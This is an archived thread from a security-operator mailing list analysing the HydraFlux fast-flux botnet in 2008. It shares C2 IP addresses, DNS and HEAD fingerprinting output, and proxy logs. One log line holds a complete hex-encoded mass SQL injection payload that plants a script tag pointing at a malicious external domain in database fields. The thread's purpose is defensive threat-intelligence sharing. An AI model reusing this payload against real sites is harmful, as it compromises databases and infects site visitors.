[nsp-sec] HydraFlux is wootyful delicious - Re: rundll841.com wwwDOTwin496.com wwwDOTtag58.com err68.comand sysid72.com sqlinjection sites.
Chris Morrow
morrowc at ops-netman.net
Mon Jun 9 22:34:26 EDT 2008
On Mon, 9 Jun 2008, William Salusky wrote:
> ----------- nsp-security Confidential --------
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Ah yes. forum_asp.php is the polling URI that commands/triggers the
> mass sql injection propagation vector. You've gotta love the full life
> cycle maliciousness involved in HydraFlux.
>
> begin: exploit servers
> to get more eyeballs
> to compromise more clients
> to serve more traffic
> to send more spam
> to get more eyeballs
> to compromise new clients
> to sql inject new servers
> goto begin
>
>
>
> Mr. <aol>calling you a bum</aol> Morrow, you will want to pass the
> following off to Niels. </theOfficialAOL-metoo>
<snausages>Niels might read this email... but the folks
internally watching (and answering) search queries (we have
lots of folks reading your queries so we can provide answers
FAST!) apparently already know about this one and are poking
at it for a fix...</snausages>
thanks though! (as always, more info is better...)
-Chris
google-search-response-guy-#312312
>
> xp2-58 - - [05/Jun/2008:14:01:24 -0700] "POST
> http://66.199.241.98/forum_asp.php HTTP/1.1" - - "-" "Mozilla/4.0 (c
> ompatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=0
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE
> ~ 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=800
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=600
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=900
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=300
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=400
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=700
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=500
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=100
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "GET
> http://www.google.com/search?hl=en&num=100&ft=i&as_qdr=all&as_occt=an
> y&safe=images&as_q=inurl%3Aasp+inurl%3Ab+reanesthetized+6&start=200
> HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MS
> IE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
> xp2-58 - - [05/Jun/2008:14:01:25 -0700] "POST
> http://66.197.233.133/forum_asp.php HTTP/1.1" - - "-" "Mozilla/4.0 (
> compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)"
>
>
> Followed shortly thereafter by downstream sql injection madness of the
> following...
>
>
> xp2-58 - - [05/Jun/2008:14:01:38 -0700] "GET
> http://www.essentielles.net/communaute/public/forums/forumdetail.asp?
> s=500&fid=28&pagecur=288;DECLARE%20 at S%20VARCHAR(4000);SET%20 at S=CAST(0x4445434C415245204054205641524348415228323535
> 292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420
> 612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D62
> 2E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E7874
> 7970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D
> 205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E204558
> 45432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E564552542856415243484152283430
> 3030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E72756E646C6C3834312E636F6D2F622E6A
> 733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C40432045
> 4E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000))
> ;EXEC(@S);-- HTTP/1.1" - - "-" "Mozilla/4.0 (compatible; MSIE 7.0;
> Windows NT 5.1; .NET CLR 2.0.50727)"
>
>
>
> White, Gerard wrote:
> | Bonus Info:
> |
> | Two major incarnations on the go:
> |
> | FIRST INCARNATION:
> | POST /forum_asp.php HTTP/1.1
> | ...
> | Content-Type: multipart/form-data; boundary=FiElDBoUnDaRy
> |
> | SECOND INCARNATION:
> | POST /forum.php HTTP/1.1
> | ...
> | Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
> |
> |
> | Most Excellent Post, Mr. Salusky...
> |
> | GW
> | 855 - Bell Aliant
> |
> |> -----Original Message-----
> |> From: nsp-security-bounces at puck.nether.net
> | [mailto:nsp-security-bounces at puck.nether.net] On Behalf Of
> |> William Salusky
> |> Sent: Thursday, June 05, 2008 2:44 PM
> |> To: Smith, Donald
> |> Cc: nsp-security at puck.nether.net
> |> Subject: Re: [nsp-sec] rundll841.com wwwDOTwin496.com wwwDOTtag58.com
> | err68.comand sysid72.com
> |> sqlinjection sites.
> |>
> |> ----------- nsp-security Confidential --------
> |>
> | Hey Don,
> |
> | Responses inline. The short answer == yes, this is HydraFlux.
> |
> | | I assume you checked the IP addresses involved and validated this
> |> was
> | | the hydraflux net?
> |
> | The IP addresses I've listed are involved as the upstream motherships
> | themselves and management/monitoring nodes, they are not fluxnode
> | endpoints themselves. You would not see any subset of those IPs
> | advertised as A or NS records for any of the active flux domains.
> |
> | | I assume this is in the drive-by category. Does that imply the sql
> | | injection team has leased a portion of the hydra-flux network?
> |
> | I can't say with authority that any of the content types being
> |> serviced
> | by this particular flux net is a leasing/rental arrangement, but the
> | varying M.O's involved in content delivery seem to suggest that a
> | leasing of flux services is involved. If you consider the overall
> | design, management and dynamic reconfiguration capabilities of this
> | fluxnet, It would be *criminally* underutilized if it were not
> | specifically purposed to service the larger miscreant community. :/
> |
> | | I have not run a netflow report on the fast fluxed hosting addresses
> |> but
> | | it might be interesting to see whom they are talking to besides port
> |> 80.
> | If you do run flow for endpoints transiting your networks, you should
> | see both TCP 80 (config checks) and TCP 4449 (flux content
> |> redirection)
> | to the upstream motherships that are listed on the HydraFlux page.
> |> The
> | most direct approach in flow reporting would be to pull flow solely
> |> for
> | the mothership IPs. Perhaps you might find some interesting
> |> interactive
> | control channels worthy of sharing. ;)
> |
> | Here's the active mothership list to shortcut your flow reporting
> |> needs!
> | 'host 203.117.170.42 or host 216.150.79.226 or host 64.191.14.85 or
> |> host
> | 64.191.39.85 or host 66.197.168.5 or host 66.197.216.229 or host
> | 66.197.233.133 or host 66.199.241.98 or host 66.232.102.169'
> |
> |
> | Looking at the round-robin on rundll841.com:
> |
> | rundll841.com. 600 IN A 87.205.169.60
> | rundll841.com. 600 IN A 79.185.9.66
> | rundll841.com. 600 IN A 82.143.130.48
> | rundll841.com. 600 IN A 84.121.222.104
> | rundll841.com. 600 IN A 83.8.41.4
> | rundll841.com. 600 IN A 77.91.20.173
> | rundll841.com. 600 IN A 83.242.74.153
> | rundll841.com. 600 IN A 156.17.227.155
> | rundll841.com. 600 IN A 85.60.114.1
> | rundll841.com. 600 IN A 83.11.157.206
> | rundll841.com. 600 IN A 78.92.72.81
> | rundll841.com. 600 IN A 12.207.206.75
> | rundll841.com. 600 IN A 83.24.137.250
> | rundll841.com. 600 IN A 78.130.145.225
> |
> | ;; AUTHORITY SECTION:
> | rundll841.com. 172800 IN NS ns2.rundll841.com.
> | rundll841.com. 172800 IN NS ns3.rundll841.com.
> | rundll841.com. 172800 IN NS ns1.rundll841.com.
> | rundll841.com. 172800 IN NS ns4.rundll841.com.
> |
> |
> | You can fingerprinting the HTTP redirect behavior of any live
> |> fluxnodes
> | demonstrating the same nginx version, 'ETag' hash, last modified
> | date/etc... (do this based on content known to be actively served in
> | this fluxnet... details.aspx is phish related)
> |
> | $ HEAD http://84.121.222.104/details.aspx
> | 200 OK
> | Connection: close
> | Date: Sun, 06 May 2007 02:43:05 GMT
> | Accept-Ranges: bytes
> | ETag: "108140-1f6b-44dcc616c5780"
> | Server: nginx/0.6.31
> | Content-Length: 8043
> | Content-Type: text/html; charset=UTF-8
> | Last-Modified: Thu, 22 May 2008 07:08:30 GMT
> | Client-Date: Thu, 05 Jun 2008 16:52:00 GMT
> | Client-Peer: 84.121.222.104:80
> | Client-Response-Num: 1
> |
> | $ HEAD http://87.205.169.60/details.aspx
> | ^[[6~^[[6200 OK
> | Connection: close
> | Date: Sun, 06 May 2007 02:38:44 GMT
> | Accept-Ranges: bytes
> | ETag: "108140-1f6b-44dcc616c5780"
> | Server: nginx/0.6.31
> | Content-Length: 8043
> | Content-Type: text/html; charset=UTF-8
> | Last-Modified: Thu, 22 May 2008 07:08:30 GMT
> | Client-Date: Thu, 05 Jun 2008 16:47:39 GMT
> | Client-Peer: 87.205.169.60:80
> | Client-Response-Num: 1
> |
> |
> | Worth noting is that the nginx server version reports differently when
> | checking against the base index versus actual URI paths configured in
> | the <hls> section for redirection to the motherships determined by the
> | <s> config chunk. If I get a chance to confirm I will, but the
> |> generic
> | nginx/0.5.33 Server: value may simply be built into the fluxnode
> |> client
> | for responses to default content paths that are NOT configured in the
> | <hls> config section.
> |
> | $ HEAD 87.205.169.60
> | 200 OK
> | Connection: close
> | Date: Thu, 05 Jun 2008 16:37:21 GMT
> | Accept-Ranges: bytes
> | ETag: "10816a-5d-44e691ba25a40"
> | Server: nginx/0.5.33
> | Content-Length: 93
> | Content-Type: text/html; charset=UTF-8
> | Last-Modified: Fri, 30 May 2008 02:07:29 GMT
> | Client-Date: Thu, 05 Jun 2008 16:38:10 GMT
> | Client-Peer: 87.205.169.60:80
> | Client-Response-Num: 1
> |
> | $ HEAD 79.185.9.66
> | 200 OK
> | Connection: close
> | Date: Thu, 05 Jun 2008 09:41:51 GMT
> | Accept-Ranges: bytes
> | ETag: "10816a-5d-44e691ba25a40"
> | Server: nginx/0.5.33
> | Content-Length: 93
> | Content-Type: text/html; charset=UTF-8
> | Last-Modified: Fri, 30 May 2008 02:07:29 GMT
> | Client-Date: Thu, 05 Jun 2008 16:38:21 GMT
> | Client-Peer: 79.185.9.66:80
> | Client-Response-Num: 1
> |
> |
> | If you dig against any of the NS records, you see consistent
> |> delivery...
> | ;; ANSWER SECTION:
> | ns2.rundll841.com. 600 IN A 66.233.229.99
> | ns2.rundll841.com. 600 IN A 86.16.211.245
> | ns2.rundll841.com. 600 IN A 62.121.110.4
> | ns2.rundll841.com. 600 IN A 68.202.106.222
> | ns2.rundll841.com. 600 IN A 77.253.254.126
> | ns2.rundll841.com. 600 IN A 217.28.146.253
> | ns2.rundll841.com. 600 IN A 75.137.93.12
> | ns2.rundll841.com. 600 IN A 71.59.102.113
> | ns2.rundll841.com. 600 IN A 79.184.58.105
> | ns2.rundll841.com. 600 IN A 172.170.167.178 <-
> |> Heh!
> | ns2.rundll841.com. 600 IN A 89.228.212.197
> |
> |
> | You can fingerprint HydraFlux's wildcard DNS behavior through *any* of
> | the fluxnode endpoints regardless of whether they are advertised
> |> solely
> | as the A record or NS auth record round-robin, or not advertised at
> |> ALL
> | but are known entities from recent history of dns monitoring that you
> | might have in place.
> |
> | 'blah.poop.com' is NOT a flux domain, but as you see by this arbitrary
> | request issued to one of the flux node endpoints, they service any
> | inbound NS request as dictated by the last fluxnode forum.php config
> | update defined in the <d_n> section.
> |
> | $ dig blah.poop.com @66.233.229.99
> |
> | ; <<>> DiG 9.2.4 <<>> blah.poop.com @66.233.229.99
> | ; (1 server found)
> | ;; global options: printcmd
> | ;; Got answer:
> | ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49504
> | ;; flags: qr aa rd; QUERY: 1, ANSWER: 15, AUTHORITY: 0, ADDITIONAL: 0
> |
> | ;; QUESTION SECTION:
> | ;blah.poop.com. IN A
> |
> | ;; ANSWER SECTION:
> | blah.poop.com. 600 IN A 79.185.9.66
> | blah.poop.com. 600 IN A 99.194.80.27
> | blah.poop.com. 600 IN A 76.97.50.172
> | blah.poop.com. 600 IN A 78.92.72.81
> | blah.poop.com. 600 IN A 83.242.74.153
> | blah.poop.com. 600 IN A 83.11.157.206
> | blah.poop.com. 600 IN A 79.184.189.79
> | blah.poop.com. 600 IN A 91.192.58.61
> | blah.poop.com. 600 IN A 78.130.145.225
> | blah.poop.com. 600 IN A 82.143.130.48
> | blah.poop.com. 600 IN A 156.17.227.155
> | blah.poop.com. 600 IN A 84.121.222.104
> | blah.poop.com. 600 IN A 77.91.20.173
> | blah.poop.com. 600 IN A 83.8.41.4
> | blah.poop.com. 600 IN A 83.24.137.250
> |
> | ;; Query time: 67 msec
> | ;; SERVER: 66.233.229.99#53(66.233.229.99)
> | ;; WHEN: Thu Jun 5 09:40:24 2008
> | ;; MSG SIZE rcvd: 271
> |
> |
> |
> |
> |
> |
> |>
> |>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
> |>
> Please do not Forward, CC, or BCC this E-mail outside of the
> | nsp-security
> community. Confidentiality is essential for effective Internet
> | security counter-measures.
> _______________________________________________
>
> - --
>
> William Salusky
> william.salusky at aol.net
> Sr. Technical Security Investigator - AOL Operations Security
> 703-265-4924 (desk)
> 703-201-8873 (cell)
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.5 (Cygwin)
>
> iD8DBQFITeT/Xyx2ON3+G40RAkkgAJ4qwEJI78xN5vUBqTLHPox9EI/qkwCgk8Qa
> SI44puE+T8IcBMwyedThO2w=
> =SXhp
> -----END PGP SIGNATURE-----
>
>
> _______________________________________________
> nsp-security mailing list
> nsp-security at puck.nether.net
> https://puck.nether.net/mailman/listinfo/nsp-security
>
> Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
> community. Confidentiality is essential for effective Internet security
> counter-measures.
> _______________________________________________
>
More information about the nsp-security
mailing list